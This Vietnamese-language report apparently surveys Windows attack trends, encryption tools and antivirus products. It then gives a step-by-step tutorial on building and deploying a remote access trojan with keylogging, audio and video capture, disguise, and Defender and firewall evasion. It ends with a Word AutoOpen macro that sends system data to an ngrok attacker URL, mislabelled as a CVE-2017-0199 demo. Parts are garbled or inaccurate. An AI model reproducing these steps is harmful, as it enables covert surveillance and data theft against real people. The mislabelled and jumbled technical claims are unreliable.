Trong hệ điều hành Windows, có nhiều kiểu tấn công mà các hacker có thể sử dụng để xâm nhập hoặc gây thiệt hại cho hệ thống.. Trong hệ điều hành Windows, có nhiều kiểu tấn công mà các ha
Các kiểu tấn công trên windown 1 Trong hệ điều hành Windows, có nhiều kiểu tấn công mà các hacker có thể sử dụng để xâm nhập hoặc gây thiệt hại cho hệ thống Dưới đây là một số kiểu tấn công phổ biến
Các kiểu tấn công phổ biến 2024
Tấn công sử dụng AI sinh học (Generative AI-Driven Attacks):
Các cuộc tấn công mạng hiện nay ngày càng sử dụng trí tuệ nhân tạo (AI) để tự động hóa quy trình do thám, khai thác lỗ hổng và thực hiện các cuộc tấn công phishing AI không chỉ giúp tạo ra các email phishing tinh vi mà còn xác định các tài sản dễ bị tổn thương như tường lửa và VPN, từ đó gia tăng hiệu quả của các cuộc tấn công này.
Nguy cơ: AI có thể giúp hacker tấn công ở quy mô lớn và hiệu quả hơn.
Ransomware dưới dạng dịch vụ (Ransomware-as-a-Service):
Mô hình này cho phép những kẻ tấn công có kỹ năng hạn chế thực hiện các cuộc tấn công ransomware một cách dễ dàng hơn Đồng thời, sự gia tăng của các nhà môi giới truy cập ban đầu cũng cho thấy xu hướng cung cấp quyền truy cập trái phép vào mạng ngày càng phổ biến.
Nguy cơ: Các cuộc tấn công không mã hóa để tránh bị phát hiện đang trở nên phổ biến Tấn công Man-in-the-Middle (MiTM):
Cuộc tấn công Man-in-the-Middle (MiTM) diễn ra khi thông tin truyền giữa hai bên bị chặn và thay đổi mà không bị phát hiện Sự xuất hiện của công cụ Phishing-as-a-Service đã làm cho các cuộc tấn công MiTM trở nên dễ tiếp cận hơn, gây ra nhiều rủi ro cho người dùng.
Nguy cơ: Các cuộc tấn công này có thể dẫn đến việc truy cập trái phép, đánh cắp dữ liệu và thông tin quan trọng
Tấn công chuỗi cung ứng (Supply Chain Attacks):
Mô tả: Các cuộc tấn công phishing ngày càng tinh vi và cá nhân hóa hơn, sử dụng AI để tạo ra các thông điệp rất thuyết phục.
The increasing risk of cyber scams poses a significant threat to users, who may unknowingly provide sensitive information or download harmful files To stay informed and protect against these dangers, individuals and organizations can refer to resources such as Zscaler's cybersecurity predictions for 2024, the National Cyber Security Centre, CISA's cybersecurity guidelines, Broadcom's security support, Check Point's research, and Symantec's security center.
Các thuật toán mã hóa và lưu trữ trên windown 1 Các thuật toán mã hóa phổ biến
Công cụ và phần mềm lưu trữ mã hóa trên Windows
BitLocker là tính năng mã hóa đĩa toàn diện có sẵn trong Windows Pro và Enterprise, sử dụng AES để bảo vệ dữ liệu khỏi truy cập trái phép Nó rất hữu ích cho việc mã hóa ổ đĩa hệ thống và ổ đĩa di động, giúp bảo vệ dữ liệu nhạy cảm một cách hiệu quả.
VeraCrypt là phần mềm mã hóa miễn phí và mã nguồn mở, cho phép mã hóa on-the-fly cho các tệp tin, phân vùng và toàn bộ ổ đĩa Phần mềm hỗ trợ nhiều thuật toán mã hóa mạnh mẽ như AES, Serpent và Twofish, giúp bảo vệ an toàn cho dữ liệu VeraCrypt rất thích hợp để bảo vệ tệp tin cá nhân và các ổ đĩa di động, đảm bảo thông tin của người dùng luôn được an toàn.
7-Zip là một phần mềm nén và giải nén tệp tin miễn phí, nổi bật với khả năng mã hóa AES-256 cho tệp tin và thư mục Ứng dụng của 7-Zip rất phù hợp cho việc nén và mã hóa tệp tin trước khi lưu trữ hoặc truyền tải, giúp bảo vệ dữ liệu hiệu quả.
Mô tả: AxCrypt là một phần mềm mã hóa tệp tin dễ sử dụng, cung cấp mã hóa AES-128 và AES-256
Ứng dụng tích hợp liền mạch với Windows Explorer, cho phép người dùng mã hóa và giải mã tệp tin nhanh chóng Đây là lựa chọn lý tưởng cho những ai muốn bảo vệ tệp tin cá nhân một cách đơn giản và hiệu quả.
Web tham khảo: https://csrc.nist.gov/pubs/sp/800/38/a/final
Những CPI phòng chống trên Windown và 1 số ứng dụng 1 Một số CPI cần làm trên Windown
Một số ứng dụng
Malwarebytes: Phần mềm chống malware mạnh mẽ, giúp phát hiện và loại bỏ các phần mềm độc hại, mã độc từ hệ thống của bạn.
Bitdefender Antivirus là phần mềm diệt virus hàng đầu, nổi bật với khả năng bảo vệ mạnh mẽ trước virus, phần mềm độc hại và các mối đe dọa trực tuyến khác.
CCleaner: Công cụ tối ưu hóa hệ thống và dọn dẹp máy tính, giúp loại bỏ tập tin rác, dọn sạch registry và tăng tốc độ máy tính.
Avast Free Antivirus là phần mềm diệt virus miễn phí nổi bật với tính năng bảo vệ nâng cao, giúp ngăn chặn phần mềm độc hại, email spam và các hình thức lừa đảo trực tuyến hiệu quả.
Dịch vụ VPN hàng đầu này giúp bảo vệ thông tin cá nhân của bạn khi sử dụng mạng công cộng, cung cấp khả năng mã hóa dữ liệu và ẩn địa chỉ IP hiệu quả.
Demo kĩ thuật tấn công RAT(Remote Access Trojan) Các bước xây dựng RAT( remote access trojan)
Các bước xây dựng RAT( remote access trojan)
Natport trên modem máy hacker: sử dụng port forwading để nat ra internet nếu muốn ko cần mạng lan vẫn truy cập được
Hình 1 Xử dụng con RAT để gửi tới máy nạn nhân
Xử dụng bất kỳ con rat nào mà bạn muốn xây dựng để gửi đến máy nạn nhân, dưới đây mình sẽ gắn port đã nat trên modem
Hình 2 Gắn Port đã đượcc NAT trên modem
Bước tiếp theo sẽ nhập địa chỉ ip của máy hacker và port đang nat trên modem
Hình 3 Gắn IP của máy hacker và port đang NAT trên modem
Chức năng này cho phép người dùng thiết lập chế độ ẩn cho rat, giúp rat có thể ẩn mình trong các thư mục, tập tin hoặc dưới tên ứng dụng cụ thể, giống như một đặc công.
Hình 4 Thiết lập ẩn mình giả dạng qua các file của RAT
RAT cho phép thu thập thông tin từ hệ thống và gửi về cho bạn, với chế độ mặc định là hiển thị (cửa sổ cmd sẽ xuất hiện khi nhấp vào) Bạn có thể ẩn nó bằng cách sử dụng iexpress, và trong trường hợp sử dụng bản crack, bạn có thể chọn chế độ ẩn.
Hình 5 Cho phép RAT ăn cắp thông tin
Ghi lại các hoạt động trên bàn phím Có chức năng ghi online hoặc ghi offline.
Hình 6 Ghi lại hoạt động trên bàn phím để nhận biết online và offline
Thiết lập chụp ảnh, ghi âm trên máy tính nạn nhân.
Hình 7 Thiết lập chụp ảnh và ghi âm trên máy điểm danh
Và cuối cùng ấn build để hoàn hành file exe và tiến hành gửi đến file nạn nhân
Hình 8 Hoàn tất build hệ thống RAT
Sau khi cài đặt RAT vào máy nạn nhân, hệ điều hành Windows 10 sẽ nhận diện nó như một virus Để tiếp tục, chúng ta cần tạm thời tắt Windows Defender Dưới đây, tôi sẽ hướng dẫn chi tiết cách tắt tính năng bảo mật của Windows khi người dùng nhận được file này.
Hình 9 Hệ thống windown defen của uiwndow được tắt
Sau khi nạn nhân chạy tệp exe mà không cần quyền admin, hacker có thể truy cập vào máy tính của nạn nhân và thực hiện mọi hành động mà hacker mong muốn.
Hình 10 Truy cập được vào máy nạn nhân
Các chức năng mà con RAT này làm được trên máy nạn nhân
Hình 12 Xem file hiện có
Hình 14 Xem được các register
Dưới đây là một số cách nếu bạn cài lên máy win 10 hoặc 11
Tắt tường lửa bằng file bat và chuyển nó thành file exe bằng công cụ iexpress có sẳn trong window
Để thực hiện thao tác này, bạn cần thêm hai file exe vào hệ thống Trước tiên, hãy chạy file tắt tường lửa, sau đó mới khởi động file Rat Nếu bạn muốn đánh lừa nạn nhân một cách dễ dàng hơn, sau khi tạo file exe từ hai file trên, hãy kết hợp nó với một file exe của ứng dụng khác và thực hiện theo cách tương tự.
Hình 18 Thay đổi file để nạn nhân dễ bị lừa
Ẩn cửa sổ cmd khi chạy
Trước khi chạy thì làm thêm 1 vài bước để đánh lừa nạn nhân, đổi icon, buộc chạy bằng quyền admin
Hình 21 Thay đổi level chạy được với quyền Admin
Như bạn thấy thì sau khi mình bật trình quét virus lên thì filerat cũ đã bị xóa
Hình 22 Khi mở quét virus thì RAT cũ sẽ bị xóa
Hãy thử gửi file hello.exe mới để kiểm tra xem nó có thể vượt qua Windows Defender hay không, đồng thời xem người dùng có thể tự tắt bảo mật Windows bằng cách nhấp vào file đó hay không.
Như bạn thấy, window không hề nhận ra đây là 1 file rat để xóa đi, giờ thì chờ người dùng click vào thôi
Hình 24 Giả mạo thành công
Người dùng đã thành công trong việc nhiễm RAT, cho thấy rằng lệnh tắt Windows Defender bằng file BAT không đủ để ẩn RAT này Bạn có thể tìm hiểu các phương pháp để bỏ qua bảo mật của Windows thông qua ứng dụng hoặc file nào đó để hệ thống không phát hiện.
Hình 25 Đã bị nhiễm RAT mà không hề biết
Hoặc ta có thể mã hóa file virus đó bằng các tool để hạn chế việc window quét ra
Để tránh bị quét, việc mã hóa file RAT là rất quan trọng Bạn nên kiểm tra virus trên VirusTotal để so sánh sự khác biệt giữa file đã mã hóa và file chưa mã hóa.
Khi file chưa được mã hóa, sự khác biệt rất rõ ràng Để tránh việc Windows Defender phát hiện, bạn có thể sử dụng các công cụ mã hóa RAT, file exe hoặc mã hóa bất kỳ file virus nổi bật nào hiện nay để ẩn đi "bé yêu" của bạn.
Có thể tăng dung lượng cho file exe RAT, vì Windows Defender thường bỏ qua các file có dung lượng lớn và không quét chúng Dưới đây là kết quả.
Hình 29: tăng dung lượng file
Hình 30: qua mặt window defend thành công
Demo CVE-2017-0199 Tổng quan về CVE-2017-0199
CVE-2017-0199 là một lỗ hổng trong VBScript Engine của Microsoft Lỗi này xảy ra khi VBScript
Lỗ hổng trong engine xử lý các đối tượng đặc biệt trong tài liệu Microsoft Office và trình duyệt Internet Explorer cho phép kẻ tấn công thực thi mã từ xa Khi nạn nhân mở tài liệu độc hại hoặc truy cập vào trang web chứa mã độc, nguy cơ bị tấn công tăng cao.
Cài đặt python và Flask
Cài đặt Flask trên terminal: pip install flask
Tạo 1 tệp python với tên server.py
Viết đoạn code vào file server.py :
Hình 26 Tạo máy chủ Flask
Tải vài cài đặt Ngrok ngrok.com
Khi cài đặt xong vào terminal chạy lệnh: ngrok http 5000
Ngrok sẽ cung cấp cho đoạn url vd: http://abc.ngrok.io để nhận dữ liệu
3 Tạo file Office và chèn đoạn script VBA:
Tạo file word với đuôi file document.docm
Vào Developer mục Visual Basic chèn đoạn script sau:
' This script runs when the document is opened
Set objShell = CreateObject("WScript.Shell")
' Execute the ipconfig command and get output
Set objExec = objShell.Exec("ipconfig /all")
Do While Not objExec.StdOut.AtEndOfStream strOutput = strOutput & objExec.StdOut.ReadLine & vbCrLf
' Send the output to attacker's server
' Display the output (for demonstration purposes)
Sub SendData(data As String)
' URL of the attacker's server endpoint from Ngrok url = http://abcd1234.ngrok.io/receive_data (Có thể thay đổi do ngrok cấp url)
' Prepare the data to be sent params = "data=" & URLEncode(data) xmlhttp.Open "POST", url, False
' Set content type to application/x-www-form-urlencoded xmlhttp.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
' Send the request with data xmlhttp.send params
Function URLEncode(str As String) As String
Dim code As String outStr = ""
For i = 1 To Len(str) c = Mid(str, i, 1)
Case 48 To 57, 65 To 90, 97 To 122 ' Alphanumeric characters outStr = outStr & c
Case Else code = "%" & Hex(Asc(c))
Giải thích các hàm trong đoạn script:
Sub AutoOpen(): Đây là một macro đặc biệt trong Word VBA, nó tự động chạy khi tài liệu Word được mở.
Sub ScanIP(): Hàm này sẽ thực hiện quá trình quét và gửi IP
Hàm SendData() gửi dữ liệu đến máy chủ từ xa thông qua yêu cầu HTTP POST, trong khi hàm URLEncode(str As String) mã hóa một chuỗi thành định dạng URL.
Triển khai theo thứ tự:
2 Chạy lệnh terminal: ngrok http 5000
3 Chèn url mà ngrok cấp, lưu file và sau đó gửi cho máy nạn nhân
Hình 27 Kết quả triển khai thành công